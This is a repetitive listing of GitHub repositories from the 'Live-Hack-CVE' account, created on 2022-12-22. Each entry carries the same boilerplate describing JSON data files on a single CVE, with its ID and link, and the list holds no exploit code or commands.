**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22576 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22576](https://github.com/Live-Hack-CVE/CVE-2022-22576) create time: 2022-12-22T20:14:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27782 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27782](https://github.com/Live-Hack-CVE/CVE-2022-27782) create time: 2022-12-22T20:14:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32205 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32205](https://github.com/Live-Hack-CVE/CVE-2022-32205) create time: 2022-12-22T20:13:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27776](https://github.com/Live-Hack-CVE/CVE-2022-27776) create time: 2022-12-22T20:13:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27774](https://github.com/Live-Hack-CVE/CVE-2022-27774) create time: 2022-12-22T20:13:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-9905 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-9905](https://github.com/Live-Hack-CVE/CVE-2014-9905) create time: 2022-12-22T18:47:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-5395 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-5395](https://github.com/Live-Hack-CVE/CVE-2015-5395) create time: 2022-12-22T18:47:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6188 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6188](https://github.com/Live-Hack-CVE/CVE-2016-6188) create time: 2022-12-22T18:47:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6191 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6191](https://github.com/Live-Hack-CVE/CVE-2016-6191) create time: 2022-12-22T18:47:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6189 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6189](https://github.com/Live-Hack-CVE/CVE-2016-6189) create time: 2022-12-22T18:47:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20199 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20199](https://github.com/Live-Hack-CVE/CVE-2022-20199) create time: 2022-12-22T18:46:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7346 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7346](https://github.com/Live-Hack-CVE/CVE-2020-7346) create time: 2022-12-22T18:53:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-4497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-4497](https://github.com/Live-Hack-CVE/CVE-2020-4497) create time: 2022-12-22T18:51:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24855](https://github.com/Live-Hack-CVE/CVE-2020-24855) create time: 2022-12-22T18:50:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20588](https://github.com/Live-Hack-CVE/CVE-2020-20588) create time: 2022-12-22T18:48:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23892 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23892](https://github.com/Live-Hack-CVE/CVE-2021-23892) create time: 2022-12-22T18:53:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31838 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31838](https://github.com/Live-Hack-CVE/CVE-2021-31838) create time: 2022-12-22T18:52:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31843](https://github.com/Live-Hack-CVE/CVE-2021-31843) create time: 2022-12-22T18:52:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31854](https://github.com/Live-Hack-CVE/CVE-2021-31854) create time: 2022-12-22T18:52:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3485 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3485](https://github.com/Live-Hack-CVE/CVE-2021-3485) create time: 2022-12-22T18:52:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28544](https://github.com/Live-Hack-CVE/CVE-2021-28544) create time: 2022-12-22T18:51:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4226 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4226](https://github.com/Live-Hack-CVE/CVE-2021-4226) create time: 2022-12-22T18:48:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33420 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33420](https://github.com/Live-Hack-CVE/CVE-2021-33420) create time: 2022-12-22T18:47:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4245 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4245](https://github.com/Live-Hack-CVE/CVE-2021-4245) create time: 2022-12-22T18:46:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35252 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35252](https://github.com/Live-Hack-CVE/CVE-2021-35252) create time: 2022-12-22T18:46:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3775](https://github.com/Live-Hack-CVE/CVE-2022-3775) create time: 2022-12-22T18:56:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30679 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30679](https://github.com/Live-Hack-CVE/CVE-2022-30679) create time: 2022-12-22T18:56:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35693](https://github.com/Live-Hack-CVE/CVE-2022-35693) create time: 2022-12-22T18:56:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4615 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4615](https://github.com/Live-Hack-CVE/CVE-2022-4615) create time: 2022-12-22T18:56:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4614 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4614](https://github.com/Live-Hack-CVE/CVE-2022-4614) create time: 2022-12-22T18:56:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44488 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44488](https://github.com/Live-Hack-CVE/CVE-2022-44488) create time: 2022-12-22T18:56:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44474 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44474](https://github.com/Live-Hack-CVE/CVE-2022-44474) create time: 2022-12-22T18:56:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44471 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44471](https://github.com/Live-Hack-CVE/CVE-2022-44471) create time: 2022-12-22T18:56:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44470 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44470](https://github.com/Live-Hack-CVE/CVE-2022-44470) create time: 2022-12-22T18:56:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44467](https://github.com/Live-Hack-CVE/CVE-2022-44467) create time: 2022-12-22T18:56:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44466 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44466](https://github.com/Live-Hack-CVE/CVE-2022-44466) create time: 2022-12-22T18:55:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44465 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44465](https://github.com/Live-Hack-CVE/CVE-2022-44465) create time: 2022-12-22T18:55:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44463](https://github.com/Live-Hack-CVE/CVE-2022-44463) create time: 2022-12-22T18:55:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42365 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42365](https://github.com/Live-Hack-CVE/CVE-2022-42365) create time: 2022-12-22T18:55:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42364 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42364](https://github.com/Live-Hack-CVE/CVE-2022-42364) create time: 2022-12-22T18:55:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42362 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42362](https://github.com/Live-Hack-CVE/CVE-2022-42362) create time: 2022-12-22T18:55:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42357 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42357](https://github.com/Live-Hack-CVE/CVE-2022-42357) create time: 2022-12-22T18:55:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42356 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42356](https://github.com/Live-Hack-CVE/CVE-2022-42356) create time: 2022-12-22T18:55:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42354 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42354](https://github.com/Live-Hack-CVE/CVE-2022-42354) create time: 2022-12-22T18:55:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42350 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42350](https://github.com/Live-Hack-CVE/CVE-2022-42350) create time: 2022-12-22T18:55:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42349 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42349](https://github.com/Live-Hack-CVE/CVE-2022-42349) create time: 2022-12-22T18:55:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42348 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42348](https://github.com/Live-Hack-CVE/CVE-2022-42348) create time: 2022-12-22T18:55:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35695](https://github.com/Live-Hack-CVE/CVE-2022-35695) create time: 2022-12-22T18:55:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44940 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44940](https://github.com/Live-Hack-CVE/CVE-2022-44940) create time: 2022-12-22T18:54:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40434](https://github.com/Live-Hack-CVE/CVE-2022-40434) create time: 2022-12-22T18:54:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23543 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23543](https://github.com/Live-Hack-CVE/CVE-2022-23543) create time: 2022-12-22T18:54:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23536](https://github.com/Live-Hack-CVE/CVE-2022-23536) create time: 2022-12-22T18:54:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45041 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45041](https://github.com/Live-Hack-CVE/CVE-2022-45041) create time: 2022-12-22T18:54:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43887](https://github.com/Live-Hack-CVE/CVE-2022-43887) create time: 2022-12-22T18:54:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43883 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43883](https://github.com/Live-Hack-CVE/CVE-2022-43883) create time: 2022-12-22T18:54:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28655 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28655](https://github.com/Live-Hack-CVE/CVE-2021-28655) create time: 2022-12-22T18:10:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41961 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41961](https://github.com/Live-Hack-CVE/CVE-2022-41961) create time: 2022-12-22T18:10:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46870](https://github.com/Live-Hack-CVE/CVE-2022-46870) create time: 2022-12-22T18:10:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41962 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41962](https://github.com/Live-Hack-CVE/CVE-2022-41962) create time: 2022-12-22T18:10:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3481](https://github.com/Live-Hack-CVE/CVE-2022-3481) create time: 2022-12-22T18:10:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3590](https://github.com/Live-Hack-CVE/CVE-2022-3590) create time: 2022-12-22T18:09:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20530](https://github.com/Live-Hack-CVE/CVE-2022-20530) create time: 2022-12-22T18:09:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37018 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37018](https://github.com/Live-Hack-CVE/CVE-2022-37018) create time: 2022-12-22T18:08:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20533 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20533](https://github.com/Live-Hack-CVE/CVE-2022-20533) create time: 2022-12-22T18:08:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46908 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46908](https://github.com/Live-Hack-CVE/CVE-2022-46908) create time: 2022-12-22T18:08:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20531](https://github.com/Live-Hack-CVE/CVE-2022-20531) create time: 2022-12-22T18:08:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20529 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20529](https://github.com/Live-Hack-CVE/CVE-2022-20529) create time: 2022-12-22T17:38:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20528 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20528](https://github.com/Live-Hack-CVE/CVE-2022-20528) create time: 2022-12-22T17:38:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20526 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20526](https://github.com/Live-Hack-CVE/CVE-2022-20526) create time: 2022-12-22T17:38:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20513 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20513](https://github.com/Live-Hack-CVE/CVE-2022-20513) create time: 2022-12-22T17:38:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20514 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20514](https://github.com/Live-Hack-CVE/CVE-2022-20514) create time: 2022-12-22T17:38:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4511 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4511](https://github.com/Live-Hack-CVE/CVE-2022-4511) create time: 2022-12-22T17:38:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4513 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4513](https://github.com/Live-Hack-CVE/CVE-2022-4513) create time: 2022-12-22T17:38:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46076 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46076](https://github.com/Live-Hack-CVE/CVE-2022-46076) create time: 2022-12-22T17:38:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46914 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46914](https://github.com/Live-Hack-CVE/CVE-2022-46914) create time: 2022-12-22T17:38:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46912 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46912](https://github.com/Live-Hack-CVE/CVE-2022-46912) create time: 2022-12-22T17:37:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46910 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46910](https://github.com/Live-Hack-CVE/CVE-2022-46910) create time: 2022-12-22T17:37:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46771](https://github.com/Live-Hack-CVE/CVE-2022-46771) create time: 2022-12-22T17:37:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46435 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46435](https://github.com/Live-Hack-CVE/CVE-2022-46435) create time: 2022-12-22T17:37:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46434](https://github.com/Live-Hack-CVE/CVE-2022-46434) create time: 2022-12-22T17:37:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46432](https://github.com/Live-Hack-CVE/CVE-2022-46432) create time: 2022-12-22T17:37:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46430 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46430](https://github.com/Live-Hack-CVE/CVE-2022-46430) create time: 2022-12-22T17:37:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46428 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46428](https://github.com/Live-Hack-CVE/CVE-2022-46428) create time: 2022-12-22T17:37:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46424 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46424](https://github.com/Live-Hack-CVE/CVE-2022-46424) create time: 2022-12-22T17:37:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46423 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46423](https://github.com/Live-Hack-CVE/CVE-2022-46423) create time: 2022-12-22T17:37:26Z

